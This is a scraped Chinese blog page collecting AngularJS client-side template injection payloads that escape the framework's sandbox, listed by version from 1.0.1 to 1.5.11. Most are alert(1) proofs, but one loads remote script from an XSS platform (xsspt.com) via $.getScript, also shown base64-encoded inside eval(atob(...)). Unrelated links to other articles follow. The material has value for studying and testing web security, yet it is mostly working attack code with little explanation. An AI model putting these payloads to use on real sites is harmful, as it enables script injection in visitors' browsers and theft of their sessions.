<html>

<head>

<meta charset="utf-8">

<script src="https://cdn.bootcss.com/angular.js/1.4.6/angular.min.js"></script>

</head>

<body>

<div ng-app>{{ 7+7 }}</div>

</body>

</html>
http://www.runoob.com/try/try.php?filename=try_ng_intro
Bypass Payload



下面是一些 AngularJS 绕过的 Payload:

1.0.1 - 1.1.5

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

1.2.2 - 1.2.5

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

1.2.6 - 1.2.18

{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

1.2.19 - 1.2.23

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

1.2.24 - 1.2.29

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

1.3.0

{{!ready && (ready = true) && (

!call

? $$watchers[0].get(toString.constructor.prototype)

: (a = apply) &&

(apply = constructor) &&

(valueOf = call) &&

(''+''.toString(

'F = Function.prototype;' +

'F.apply = F.a;' +

'delete F.a;' +

'delete F.valueOf;' +

'alert(1);'

))

);}}

1.3.1 - 1.3.2

{{

{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;

'a'.constructor.prototype.charAt=''.valueOf;

 $eval('x=alert(1)//');

}}

1.3.3 - 1.3.18

{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;

'a'.constructor.prototype.charAt=[].join;

 $eval('x=alert(1)//'); }}

1.3.19

{{

'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;

 $eval('x=alert(1)//');

}}

1.3.20

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

1.4.0 - 1.4.9

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
$.getScript('http://xsspt.com/xxxx');

编码之后

eval(atob('JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20veHh4eCcpOw=='));

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };eval(atob(\'JC5nZXRTY3JpcHQoJ2h0dHA6Ly94c3NwdC5jb20veHh4eCcpOw


1.5.0 - 1.5.8

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}    ---->没有测试成功

{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(42),a')}}');}}   此条在liveoverflow.com测试成功

1.5.9 - 1.5.11

{{

 c=''.sub.call;b=''.sub.bind;a=''.sub.apply;

 c.$apply=$apply;c.$eval=b;op=$root.$$phase;

 $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;

 C=c.$apply(c);$root.$$phase=op;$root.$digest=od;

 B=C(b,c,b);$evalAsync("

 astNode=pop();astNode.type='UnaryExpression';

 astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';

 astNode.argument={type:'Identifier',name:'foo'};

");

 m1=B($$asyncQueue.pop().expression,null,$root);

 m2=B(C,null,m1);[].push.apply=m2;a=''.sub;

 $eval('a(b.c)');[].push.apply=a;

}}


												


											
Client-Side Template Injection with AngularJS的更多相关文章
	

    
								
  1. Portswigger web security academy:Server-side template injection(SSTI)
		
    Portswigger web security academy:Server-side template injection(SSTI) 目录 Portswigger web security ac ...
    
		
    2. 
						
  2. markdown反射型xss漏洞复现
		
    markdown xss漏洞复现 转载至橘子师傅:https://blog.orange.tw/2019/03/a-wormable-xss-on-hackmd.html 漏洞成因 最初是看到Hack ...
    
		
    3. 
						
  3. 先知xss挑战赛学习笔记
		
    xss游戏 游戏地址:http://ec2-13-58-146-2.us-east-2.compute.amazonaws.com/ LEMON参考wp地址 1. 文件上传 源码如下 <?php ...
    
		
    4. 
						
  4. web全套资料 干货满满 各种文章详解
		
    sql注入l MySqlMySQL False注入及技巧总结MySQL 注入攻击与防御sql注入学习总结SQL注入防御与绕过的几种姿势MySQL偏门技巧mysql注入可报错时爆表名.字段名.库名高级S ...
    
		
    5. 
						
  5. ref:web security最新学习资料收集
		
    ref:https://chybeta.github.io/2017/08/19/Web-Security-Learning/ ref:https://github.com/CHYbeta/Web-S ...
    
		
    6. 
						
  6. Web-Security-Learning
		
    Web Security sql注入 MySql MySQL False 注入及技巧总结 MySQL 注入攻击与防御 sql注入学习总结 SQL注入防御与绕过的几种姿势 MySQL偏门技巧 mysql ...
    
		
    7. 
						
  7. AngularJS 特性—SinglePage、template、Controller
		
    单页Web应用(SinglePage) 顾名思义,只使用一个页面的Web应用程序.单页面应用是指用户通过浏览器加载独立的HTML页面,Ajax加载数据页面无刷新,实现操作各种操作. 模板(templa ...
    
		
    8. 
						
  8. OData Client Code Generator
		
    转发. [Tutorial & Sample] How to use OData Client Code Generator to generate client-side proxy cla ...
    
		
    9. 
						
  9. AngularJS Directive 学习笔记
		
    指令 Directive 指令要点 大漠老师的教学节点 解析最简单的指令 hello: 匹配模式 restrict 解析最简单的指令 hello: template.tempmlateUrl.$tem ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. MFC桌面电子时钟的设计与实现
			
    目录 核心技术 需求分析 程序设计 程序展示 (一)核心技术 MFC(Micosoft Foundation Class Libay,微基础类库)是微基于Windows平台下的C++类库集合,MFC包 ...
    
			
    2. 
						
  2. jQuery根据radio来控制texteara
			
    最近遇到一个问题:需要通过点击radio来控制texteara的属性变化. 这里主要有两个知识点:1,给texteara设置属性:2,给texteara设置背景颜色. 在这里,假设texteara的i ...
    
			
    3. 
						
  3. Redis操作集合,有序集合
			
    Set操作,Set集合就是不允许重复的列表 sadd(name,values) 1 # name对应的集合中添加元素 scard(name) 1 获取name对应的集合中元素个数 sdiff(keys ...
    
			
    4. 
						
  4. Python开发【内置模块篇】
			
    动态导入模块 动态导入模块 导入一个库名为字符串的 module_t = __import__('m1.t') print (module_t) #m1 import importlib m=impo ...
    
			
    5. 
						
  5. nginx上配置phpmyadmin
			
    Nginx配置phpmyadmin流程如下: 一.准备软件和环境(这里我以ubuntu16.04为例) 1.安装php7.1 sudo LC_ALL=C.UTF- add-apt-repository ...
    
			
    6. 
						
  6. Kafka 详解(三)------Producer生产者
			
    在第一篇博客我们了解到一个kafka系统,通常是生产者Producer 将消息发送到 Broker,然后消费者 Consumer 去 Broker 获取,那么本篇博客我们来介绍什么是生产者Produc ...
    
			
    7. 
						
  7. springBoot2.0+redis+fastJson+自定义注解实现方法上添加过期时间
			
    springBoot2.0集成redis实例 一.首先引入项目依赖的maven jar包,主要包括 spring-boot-starter-data-redis包,这个再springBoot2.0之前 ...
    
			
    8. 
						
  8. vue中使用LESS、SASS、stylus
			
    less的使用 npm install less less-loader --save 修改webpack.config.js文件.vue.cli 搭建项目可跳过此步 { test: /\.less$ ...
    
			
    9. 
						
  9. [Alpha阶段]第一次Scrum Meeting
			
    Scrum Meeting博客目录 [Alpha阶段]第一次Scrum Meeting 基本信息 名称 时间 地点 时长 第一次Scrum Meeting 19/04/01 大运村寝室6楼 40min ...
    
			
    10. 
						
  10. 8 ServletContext
			
    1 为什么需要ServletContext 技术 显示网站多少人在线,显示当前登录者是第几位登录者等信息. 2 什么是ServletContext 可以把它想象成一个服务器上的公共空间,每个用户都可以 ...
    
			
    11.